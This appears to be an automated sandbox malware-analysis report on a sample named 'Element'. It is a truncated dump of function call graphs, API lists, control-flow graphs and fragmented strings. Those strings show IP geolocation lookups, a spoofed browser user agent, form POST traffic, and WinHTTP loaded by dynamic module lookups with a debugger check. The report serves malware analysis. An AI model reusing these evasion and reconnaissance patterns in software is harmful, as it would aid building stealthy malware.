110728->110757 110729 21925c740cd ISource 110730 21925c7548e 110731 21925d4b5ec 33 API calls 110730->110731 110733 21925c7549a 110731->110733 110860 21925c60710 110733->110860 110735 21925cd4f9c std::_Facet_Register 37 API calls 110735->110757 110739 21925c75542 110740 21925c755d4 110739->110740 110875 21925cd53cc AcquireSRWLockExclusive SleepConditionVariableSRW ReleaseSRWLockExclusive 110739->110875 110743 21925c75606 110740->110743 110876 21925cccde0 37 API calls 4 library calls 110740->110876 110741 21925c62700 37 API calls 110741->110757 110877 21925d47710 86 API calls 3 library calls 110743->110877 110750 21925c758db 110753 21925c75669 110753->110750 110878 21925d47ca4 55 API calls ProcessCodePage 110753->110878 110755 21925c75691 110879 21925d4764c 36 API calls ProcessCodePage 110755->110879 110757->110729 110757->110730 110757->110735 110757->110739 110757->110741 110759 21925c754d7 110757->110759 110764 21925c754e5 110757->110764 110783 21925d4b5ec 110757->110783 110786 21925cc8fd0 110757->110786 110802 21925c652a0 110757->110802 110812 21925c64840 110757->110812 110825 21925cd3480 GetModuleHandleA 110757->110825 110758 21925c75699 110880 21925d47ca4 55 API calls ProcessCodePage 110758->110880 110760 21925c60710 shared_ptr 37 API calls 110759->110760 110760->110764 110762 21925c75712 110763 21925c62700 37 API calls 110762->110763 110765 21925c75754 110763->110765 110766 21925c754b0 ISource 110764->110766 110874 21925c593d0 37 API calls std::_Xinvalid_argument 110764->110874 110778 21925c75777 ISource _Yarn 110765->110778 110881 21925cc5ee0 37 API calls 4 library calls 110765->110881 110769 21925c7576d 110771 21925c757d6 110769->110771 110772 21925c757c5 110769->110772 110769->110778 110770 21925c758b6 110885 21925d483b4 43 API calls _fread_nolock 110770->110885 110775 21925c757fa 110771->110775 110776 21925c757f3 110771->110776 110882 21925c66480 37 API calls 2 library calls 110772->110882 110775->110778 110781 21925cd4f9c std::_Facet_Register 37 API calls 110775->110781 110883 21925c66480 37 API calls 2 library calls 110776->110883 110777 21925c758d3 110886 21925d47904 58 API calls ProcessCodePage 110777->110886 110780 21925c758f8 110778->110780 110884 21925c65460 37 API calls memcpy_s 110778->110884 110781->110778 110887 21925d5626c GetLastError 110783->110887 110787 21925cc8ff9 110786->110787 110800 21925cc90dc 110786->110800 110789 21925cc9004 _Yarn 110787->110789 110791 21925cc9054 110787->110791 110792 21925cc903c 110787->110792 110789->110757 110793 21925cc9076 110791->110793 110794 21925cc90d7 110791->110794 110938 21925c66480 37 API calls 2 library calls 110792->110938 110796 21925cc9082 110793->110796 110797 21925cc908c 110793->110797 110940 21925c59330 37 API calls 2 library calls 110794->110940 110939 21925c66480 37 API calls 2 library calls 110796->110939 110797->110789 110801 21925cd4f9c std::_Facet_Register 37 API calls 110797->110801 110941 21925c593d0 37 API calls std::_Xinvalid_argument 110800->110941 110801->110789 110803 21925c652ef 110802->110803 110809 21925c65313 _Yarn 110802->110809 110804 21925c65318 110803->110804 110805 21925c65304 110803->110805 110807 21925c6533e 110804->110807 110808 21925c65334 110804->110808 110942 21925c66480 37 API calls 2 library calls 110805->110942 110807->110809 110811 21925cd4f9c std::_Facet_Register 37 API calls 110807->110811 110943 21925c66480 37 API calls 2 library calls 110808->110943 110809->110757 110811->110809 110813 21925c64870 110812->110813 110814 21925c64925 110812->110814 110816 21925c648b5 110813->110816 110817 21925c648a1 110813->110817 110823 21925c64876 _Yarn 110813->110823 110946 21925c593d0 37 API calls std::_Xinvalid_argument 110814->110946 110820 21925c648db 110816->110820 110821 21925c648d1 110816->110821 110944 21925c66480 37 API calls 2 library calls 110817->110944 110820->110823 110824 21925cd4f9c std::_Facet_Register 37 API calls 110820->110824 110945 21925c66480 37 API calls 2 library calls 110821->110945 110823->110757 110824->110823 110947 21925cd2f90 110825->110947 110828 21925cd2f90 39 API calls 110829 21925cd353a GetModuleHandleA 110828->110829 110830 21925cd2f90 39 API calls 110829->110830 110831 21925cd3589 GetModuleHandleA 110830->110831 110832 21925cd2f90 39 API calls 110831->110832 110833 21925cd35d3 GetModuleHandleA 110832->110833 110834 21925cd2f90 39 API calls 110833->110834 110835 21925cd362e GetModuleHandleA 110834->110835 110836 21925cd2f90 39 API calls 110835->110836 110837 21925cd3678 GetModuleHandleA 110836->110837 110838 21925cd2f90 39 API calls 110837->110838 110839 21925cd36c9 GetModuleHandleA 110838->110839 110840 21925cd2f90 39 API calls 110839->110840 110841 21925cd3710 GetModuleHandleA 110840->110841 110842 21925cd2f90 39 API calls 110841->110842 110843 21925cd375a GetModuleHandleA 110842->110843 110844 21925cd2f90 39 API calls 110843->110844 110845 21925cd379d 110844->110845 110846 21925c60710 shared_ptr 37 API calls 110845->110846 110850 21925cd3872 ISource 110845->110850 110847 21925cd37f8 110846->110847 110848 21925c60710 shared_ptr 37 API calls 110847->110848 110849 21925cd3807 110848->110849 110962 21925cd3900 110849->110962 110850->110757 110852 21925cd3816 110852->110850 110981 21925cc5d50 110852->110981 110854 21925cd3827 110997 21925cd3240 110854->110997 110856 21925cd3857 110856->110850 110857 21925cd385b 110856->110857 111003 21925cd32f0 52 API calls 2 library calls 110857->111003 110859 21925cd386f 110859->110850 110861 21925c60746 110860->110861 110862 21925c6075c 110861->110862 110863 21925c607f4 110861->110863 110866 21925c60783 110862->110866 110867 21925c60794 110862->110867 110872 21925c60762 _Yarn 110862->110872 111025 21925c593d0 37 API calls std::_Xinvalid_argument 110863->111025 111023 21925c66480 37 API calls 2 library calls 110866->111023 110868 21925c607b0 110867->110868 110869 21925c607b7 110867->110869 111024 21925c66480 37 API calls 2 library calls 110868->111024 110869->110872 110873 21925cd4f9c std::_Facet_Register 37 API calls 110869->110873 110872->110766 110873->110872 110876->110743 110877->110753 110878->110755 110879->110758 110880->110762 110881->110769 110882->110778 110883->110778 110884->110770 110885->110777 110886->110750 110888 21925d562ad FlsSetValue 110887->110888 110889 21925d56290 FlsGetValue 110887->110889 110891 21925d562bf 110888->110891 110894 21925d5629d ProcessCodePage 110888->110894 110890 21925d562a7 110889->110890 110889->110894 110890->110888 110926 21925d58abc 110891->110926 110897 21925d4b5f5 110894->110897 110935 21925d53304 33 API calls std::locale::_Setgloballocale 110894->110935 110895 21925d562ec FlsSetValue 110899 21925d5630a 110895->110899 110900 21925d562f8 FlsSetValue 110895->110900 110896 21925d562dc FlsSetValue 110898 21925d562e5 110896->110898 110897->110757 110932 21925d56840 9 API calls 2 library calls 110898->110932 110933 21925d5601c 9 API calls memcpy_s 110899->110933 110900->110898 110905 21925d56312 110934 21925d56840 9 API calls 2 library calls 110905->110934 110929 21925d58acd memcpy_s 110926->110929 110927 21925d58b1e 110937 21925d47004 9 API calls memcpy_s 110927->110937 110929->110927 110930 21925d562ce 110929->110930 110936 21925d4e400 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 110929->110936 110930->110895 110930->110896 110932->110894 110933->110905 110934->110894 110936->110929 110937->110930 110938->110789 110939->110789 110940->110800 110942->110809 110943->110809 110944->110823 110945->110823 110948 21925cd2fb8 110947->110948 110949 21925cd307f GetModuleHandleA 110947->110949 110948->110949 110950 21925cd30aa memcpy_s 110948->110950 110949->110828 111004 21925d4d31c 33 API calls __std_exception_copy 110950->111004 110952 21925cd30c4 110953 21925cd30e9 lstrcpyA lstrcatA GetModuleHandleA 110952->110953 110954 21925cd3138 110953->110954 110957 21925cd315d 110953->110957 111005 21925d46f14 11 API calls 2 library calls 110954->111005 110956 21925cd3185 110959 21925cd2f90 36 API calls 110956->110959 110957->110956 111006 21925d4e348 34 API calls 2 library calls 110957->111006 110960 21925cd319f 110959->110960 111007 21925d46f14 11 API calls 2 library calls 110960->111007 110963 21925cd3930 ISource 110962->110963 110964 21925cd3948 _Yarn 110962->110964 110963->110852 111008 21925c62570 37 API calls 4 library calls 110964->111008 110966 21925cd3a54 110967 21925cd3a8a 110966->110967 110979 21925cd3b52 ISource 110966->110979 111009 21925c62570 37 API calls 4 library calls 110966->111009 110968 21925cd3adb 110967->110968 110971 21925cd3a98 110967->110971 110970 21925cd3ad9 110968->110970 111010 21925c62570 37 API calls 4 library calls 110968->111010 111011 21925cd42e0 37 API calls 4 library calls 110970->111011 110976 21925c62700 37 API calls 110971->110976 110975 21925cd3b26 111012 21925cd42e0 37 API calls 4 library calls 110975->111012 110978 21925cd3abf 110976->110978 110980 21925c62700 37 API calls 110978->110980 110979->110963 111013 21925c63210 37 API calls 110979->111013 110980->110970 110982 21925cc5d85 110981->110982 110983 21925cc5e50 110982->110983 110985 21925cc5dd5 110982->110985 110986 21925cc5dc1 110982->110986 110991 21925cc5da1 _Yarn 110982->110991 111017 21925c593d0 37 API calls std::_Xinvalid_argument 110983->111017 110988 21925cc5df7 110985->110988 110989 21925cc5e4b 110985->110989 111014 21925c66480 37 API calls 2 library calls 110986->111014 110992 21925cc5e04 110988->110992 110993 21925cc5e0b 110988->110993 111016 21925c59330 37 API calls 2 library calls 110989->111016 110991->110854 111015 21925c66480 37 API calls 2 library calls 110992->111015 110993->110991 110996 21925cd4f9c std::_Facet_Register 37 API calls 110993->110996 110996->110991 110999 21925cd326a 110997->110999 110998 21925cd32b4 110998->110856 110999->110998 111000 21925cc5d50 37 API calls 110999->111000 111001 21925cd32a9 111000->111001 111018 21925cd3d40 111001->111018 111003->110859 111004->110952 111005->110949 111006->110956 111007->110949 111008->110966 111009->110967 111010->110970 111011->110975 111012->110979 111014->110991 111015->110991 111016->110983 111019 21925cd3d73 111018->111019 111020 21925cd3d5e 111018->111020 111021 21925cd3db4 ISource 111019->111021 111022 21925c62700 37 API calls 111019->111022 111020->110998 111021->110998 111022->111021 111023->110872 111024->110872 111026 21925d59048 111031 21925d58d84 33 API calls 3 library calls 111026->111031 111028 21925d5906e 111029 21925d590a2 111028->111029 111032 21925d44080 111028->111032 111031->111028 111035 21925d438b8 111032->111035 111036 21925d438cf 111035->111036 111038 21925d438ed 111035->111038 111055 21925d47004 9 API calls memcpy_s 111036->111055 111038->111036 111039 21925d43909 111038->111039 111046 21925d43f64 111039->111046 111040 21925d438d4 111056 21925d4c2d0 33 API calls _invalid_parameter_noinfo 111040->111056 111044 21925d438e0 111044->111029 111058 21925d4397c 33 API calls 2 library calls 111046->111058 111049 21925d43fb7 111059 21925d4373c 10 API calls 3 library calls 111049->111059 111050 21925d4401f 111051 21925d44023 111050->111051 111060 21925d440b4 111050->111060 111053 21925d43934 111051->111053 111103 21925d56840 9 API calls 2 library calls 111051->111103 111053->111044 111057 21925d55c58 LeaveCriticalSection 111053->111057 111055->111040 111056->111044 111058->111049 111059->111050 111104 21925d43c98 33 API calls 2 library calls 111060->111104 111062 21925d440fb 111063 21925d44129 111062->111063 111064 21925d44141 111062->111064 111117 21925d46fe4 9 API calls memcpy_s 111063->111117 111105 21925d55c80 111064->111105 111068 21925d4412e 111118 21925d47004 9 API calls memcpy_s 111068->111118 111075 21925d4413a 111075->111051 111103->111053 111104->111062 111130 21925d52e8c EnterCriticalSection 111105->111130 111117->111068 111118->111075
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: Concurrency::cancel_current_task
                    • String ID: cou$)dat$)rb$-Goo$.php$/?fo$2nam$7IP:$=jso$?s=$Bcou$Cip$Code$Code$Content-Type: application/x-www-form-urlencoded$Fcom$Gip$HGoo$IPKc$LLC$Mdem$Morg$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0$POd~$Pdem$Rorg$Unam$X[M^$Ycou$\~ij$_cod$_cod$a$a$a$a$a$a$a$aIP:$aniz$aniz$atio$atio$bnam$caiP$ck`i$dfis$e$e$e$e2$gle $gle $h15$hdat$hip$home$https://ipgeolocation.io/$https://ipinfo.io/$idem$i~ib$jfl4lrk$jip$mo/$n$n$n$ntry$ntry$ntry$ntry$ntry$ntry$o$o$o$o$oInf$oInf$oInf$oInf$oiAM$p://$pany$pany$pany$pany$php$qhtt$rmat$scom$t/de$uia$uorg$ydat$zcou$|cou$|dat$~dem
                    • API String ID: 118556049-3855956954
                    • Opcode ID: c3ee10db6944ced87cf29388952067591f9c644204210f87eb60ce5982a5682d
                    • Instruction ID: 96d96266294ea79c59d1ab65d1af079708f2dad2fc00f9655fc89a6154d539f1
                    • Opcode Fuzzy Hash: c3ee10db6944ced87cf29388952067591f9c644204210f87eb60ce5982a5682d
                    • Instruction Fuzzy Hash: 67237B72A18BC096EB30DF24E4683DEB7A5F7E5754F405315DA9807BAAEB78C584CB00
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: Close$Open$CreateValue$Concurrency::cancel_current_task
                    • String ID: M$M$M$%Sle$'#$(win$.WIN$.dll$.dll$.dll$6.dl$@win$HTTP$atio$idA$inet$inet$ingS$jfl4lrk$l$laye$laye$meA$rBB$rBBU$uia
                    • API String ID: 3835448911-2765550813
                    • Opcode ID: 3e04320f6c1c5790a2cb7aa234d6550d79e61d62acd918811130c6d50eab86e1
                    • Instruction ID: f4e165cb7cbf9edca3d0896e876d475fd93a4d9522c6d7a17bb72d016c878a3c
                    • Opcode Fuzzy Hash: 3e04320f6c1c5790a2cb7aa234d6550d79e61d62acd918811130c6d50eab86e1
                    • Instruction Fuzzy Hash: 2AE2AB32B11640A9FB14DF75E4783EC23A1E7A8798F404626EE5E47B99EB78C1C6C350

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 967 21925cd32f0-21925cd3354 call 21925cd4020 call 21925cd3ec0 972 21925cd3356-21925cd335f 967->972 973 21925cd33cd-21925cd341b call 21925cc7830 call 21925cd4140 call 21925cd4070 967->973 974 21925cd3398-21925cd33c9 972->974 975 21925cd3361-21925cd3378 972->975 989 21925cd341d-21925cd3434 973->989 990 21925cd3450-21925cd346d 973->990 974->973 977 21925cd3393 call 21925cd4f84 975->977 978 21925cd337a-21925cd338d 975->978 977->974 978->977 980 21925cd3474-21925cd37cd call 21925d4c2f0 GetModuleHandleA call 21925cd2f90 GetModuleHandleA call 21925cd2f90 GetModuleHandleA call 21925cd2f90 GetModuleHandleA call 21925cd2f90 GetModuleHandleA call 21925cd2f90 GetModuleHandleA call 21925cd2f90 GetModuleHandleA call 21925cd2f90 GetModuleHandleA call 21925cd2f90 GetModuleHandleA call 21925cd2f90 GetModuleHandleA call 21925cd2f90 call 21925cd31b0 978->980 1019 21925cd3872-21925cd387a 980->1019 1020 21925cd37d3-21925cd37dd call 21925cd31f0 980->1020 992 21925cd3436-21925cd3449 989->992 993 21925cd344b call 21925cd4f84 989->993 992->993 995 21925cd346e-21925cd3473 call 21925d4c2f0 992->995 993->990 995->980 1021 21925cd38a9-21925cd38f4 call 21925c62380 * 2 call 21925cc7830 1019->1021 1022 21925cd387c-21925cd388d 1019->1022 1020->1019 1031 21925cd37e3-21925cd3818 call 21925c60710 * 2 call 21925cd3900 1020->1031 1024 21925cd38a4 call 21925cd4f84 1022->1024 1025 21925cd388f-21925cd38a2 1022->1025 1024->1021 1025->1024 1028 21925cd38f5-21925cd38fb call 21925d4c2f0 1025->1028 1031->1019 1044 21925cd381a-21925cd3833 call 21925cc5d50 1031->1044 1047 21925cd3835 1044->1047 1048 21925cd3838-21925cd3841 1044->1048 1047->1048 1049 21925cd3846-21925cd3859 call 21925cd3240 1048->1049 1050 21925cd3843 1048->1050 1049->1019 1053 21925cd385b-21925cd386f call 21925cd32f0 1049->1053 1050->1049 1053->1019
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: HandleModule
                    • String ID: +Win$.dll$@Win$Http$Open$espo$http$ilab$nse$uts
                    • API String ID: 4139908857-425725236
                    • Opcode ID: a1d1ed7f936b3af39c98403c8cc03c629a006f6d09522c35867b88bc3d916740
                    • Instruction ID: 4acb9c44482f96738fc9c84eb9958bb9c7d6e537aaea0bc7e9be3b2b448ce44e
                    • Opcode Fuzzy Hash: a1d1ed7f936b3af39c98403c8cc03c629a006f6d09522c35867b88bc3d916740
                    • Instruction Fuzzy Hash: 82026B72B14B809AFB00DFB4D4693DD3772F765788F105205EE886BA59EB78C18AC784

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: HandleModule$lstrcatlstrcpy
                    • String ID: +Win$.dll$@Win$Http$Open$espo$http$ilab$nse$uts
                    • API String ID: 468718192-425725236
                    • Opcode ID: 9781dd0e1655e54f8228022fbb1c438dd310c16b75767e11c778bfa1b1ab73db
                    • Instruction ID: bf26097ba69b0e806be6d99fb736dd2a0c83ab08fa629e66281e614dc9660e31
                    • Opcode Fuzzy Hash: 9781dd0e1655e54f8228022fbb1c438dd310c16b75767e11c778bfa1b1ab73db
                    • Instruction Fuzzy Hash: F3D14876F04B81AAF700DFB4D4293DD3BB2F765788F105109DE486BA59EB78818AC784

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1116 21925d58abc-21925d58acb 1117 21925d58acd-21925d58ad9 1116->1117 1118 21925d58adb-21925d58aeb 1116->1118 1117->1118 1119 21925d58b1e-21925d58b29 call 21925d47004 1117->1119 1120 21925d58b02-21925d58b11 call 21925d6e0c0 1118->1120 1125 21925d58b2b-21925d58b30 1119->1125 1124 21925d58b17-21925d58b1a 1120->1124 1126 21925d58aed-21925d58af4 call 21925d50ddc 1124->1126 1127 21925d58b1c 1124->1127 1126->1119 1130 21925d58af6-21925d58b00 call 21925d4e400 1126->1130 1127->1125 1130->1119 1130->1120
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2501826641.0000021925C50000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021925C50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_21925c50000_Element.jbxd
                    Similarity
                    • API ID: AllocHeap
                    • String ID:
                    • API String ID: 4292702814-0
                    • Opcode ID: 6ede37f4c9a96b5ab927b0ed133db62c06f2130c7aea9d727cd70d3b60cba0cb
                    • Instruction ID: 5c73ac4d027f4adae03a7e7e1393ed23313e5682e914a27a0288d09a7f125356
                    • Opcode Fuzzy Hash: 6ede37f4c9a96b5ab927b0ed133db62c06f2130c7aea9d727cd70d3b60cba0cb
                    • Instruction Fuzzy Hash: A1F0B4F5342240A1FF55AB61983D3E642D8AB78BA2F2C58304D0A8B7D2EE3CC4C78210
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                    • String ID: Shell_TrayWnd
                    • API String ID: 3778422247-2988720461
                    • Opcode ID: 1994b040df7bcaa9eabea0218080e844f4ef20aa400ad816bcc9c45914f164a6
                    • Instruction ID: 2408ceecc96a7546e75061ca6fd3d5791ec19aae80602ad9e9a422b142a9eb64
                    • Opcode Fuzzy Hash: 1994b040df7bcaa9eabea0218080e844f4ef20aa400ad816bcc9c45914f164a6
                    • Instruction Fuzzy Hash: 4F415425F0969283F7149F25AC1C63A62D2BF88F86F908075C98ECB756DF7DAC098740
                    APIs
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: Destroy$ImageList_Window$DeleteMessageObjectSend$IconMove
                    • String ID:
                    • API String ID: 3372153169-0
                    • Opcode ID: a52db60d96683ae5167440ae9686500b34fe88f611b94659a0c05ff1f19a1373
                    • Instruction ID: bbbc1c59e9a1a963611510c2464099eb386a83a0602689c6d648e5bb7a104c0f
                    • Opcode Fuzzy Hash: a52db60d96683ae5167440ae9686500b34fe88f611b94659a0c05ff1f19a1373
                    • Instruction Fuzzy Hash: 9D22BDA2A0AA9381EB609F25DC9427D2765FB54F96F544132CA9EC7792DF3CEC44C380
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                    • String ID: AutoIt v3 GUI
                    • API String ID: 1458621304-248962490
                    • Opcode ID: 22bf8f5eff2e45e1177610d568fa883e96c73c6f7677b33bea6826eb6c4db9aa
                    • Instruction ID: 4d4416a7b392269d55f78ab1527cbce24afd0d9e7bcea3ad34f9c311b8aea7ba
                    • Opcode Fuzzy Hash: 22bf8f5eff2e45e1177610d568fa883e96c73c6f7677b33bea6826eb6c4db9aa
                    • Instruction Fuzzy Hash: 64D18B76A057928AE754DF38DC947AD37A0FB84B99F000235DA8E87AA5DF3CE845C740
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID:
                    • String ID: P
                    • API String ID: 0-3110715001
                    • Opcode ID: a1fc6bb4c017ecfb022866c81c1012e8c25de5f238352e173404b9bdaf33e861
                    • Instruction ID: 2fd37c73dca506508ef866ed32892a51d2bb785652dffbef61f686551ecac73d
                    • Opcode Fuzzy Hash: a1fc6bb4c017ecfb022866c81c1012e8c25de5f238352e173404b9bdaf33e861
                    • Instruction Fuzzy Hash: 7FA1CE72A09A9186E724DF25DC042B97B64FF85F86F408135EACE87A95CF7CE905CB00
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595A000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504271550.00007FF6C595E000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504308481.00007FF6C5964000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_21_2_7ff6c5870000_Element.jbxd
                    Similarity
                    • API ID: _get_daylight$ByteCharMultiWide_invalid_parameter_noinfo$InformationTimeZone
                    • String ID: -$:$:$?
                    • API String ID: 3440502458-92861585
                    • Opcode ID: 92822d708f53ba3dc96aaad2734b3637ebae0f36d94d78d477610735c797914a
                    • Instruction ID: 7a1dcc37e9e73d5c16b72b1ad0a2ff007baacc84592fcfc82b04c6e9a460a827
                    • Opcode Fuzzy Hash: 92822d708f53ba3dc96aaad2734b3637ebae0f36d94d78d477610735c797914a
                    • Instruction Fuzzy Hash: 4AE1F572A196A285E724AF31DC405AA3759FB84F96F445135EACF83A96DF3CEC418700
                    APIs
                    • GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF6C5872BC1), ref: 00007FF6C5873BA6
                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF6C5872BC1), ref: 00007FF6C5873BBB
                    • GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF6C5872BC1), ref: 00007FF6C5873C35
                      • Part of subcall function 00007FF6C5872BEC: GetFullPathNameW.KERNEL32(?,00007FF6C5873C67,?,?,?,?,?,00007FF6C5872BC1), ref: 00007FF6C5872C4D
                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF6C5872BC1), ref: 00007FF6C5873CCC
                    • MessageBoxA.USER32 ref: 00007FF6C58BAA96
                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF6C5872BC1), ref: 00007FF6C58BAAE3
                    • GetForegroundWindow.USER32(?,?,?,?,?,00007FF6C5872BC1), ref: 00007FF6C58BAB6A
                    • ShellExecuteW.SHELL32 ref: 00007FF6C58BAB91
                      • Part of subcall function 00007FF6C5873CEC: GetSysColorBrush.USER32 ref: 00007FF6C5873D06
                      • Part of subcall function 00007FF6C5873CEC: LoadCursorW.USER32 ref: 00007FF6C5873D16
                      • Part of subcall function 00007FF6C5873CEC: LoadIconW.USER32 ref: 00007FF6C5873D2B
                      • Part of subcall function 00007FF6C5873CEC: LoadIconW.USER32 ref: 00007FF6C5873D44
                      • Part of subcall function 00007FF6C5873CEC: LoadIconW.USER32 ref: 00007FF6C5873D5D
                      • Part of subcall function 00007FF6C5873CEC: LoadImageW.USER32 ref: 00007FF6C5873D89
                      • Part of subcall function 00007FF6C5873CEC: RegisterClassExW.USER32 ref: 00007FF6C5873DED
                      • Part of subcall function 00007FF6C5873E24: CreateWindowExW.USER32 ref: 00007FF6C5873E74
                      • Part of subcall function 00007FF6C5873E24: CreateWindowExW.USER32 ref: 00007FF6C5873EC7
                      • Part of subcall function 00007FF6C5873E24: ShowWindow.USER32 ref: 00007FF6C5873EDD
                      • Part of subcall function 00007FF6C587477C: Shell_NotifyIconW.SHELL32 ref: 00007FF6C5874874
                    Strings
                    Memory Dump Source
                    • Source File: 00000015.00000002.2504150743.00007FF6C5871000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C5870000, based on PE: true
                    • Associated: 00000015.00000002.2504132600.00007FF6C5870000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5925000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000015.00000002.2504213499.00007FF6C5948000.00000002.00000001.01000000.00000006.sdmpDownload File
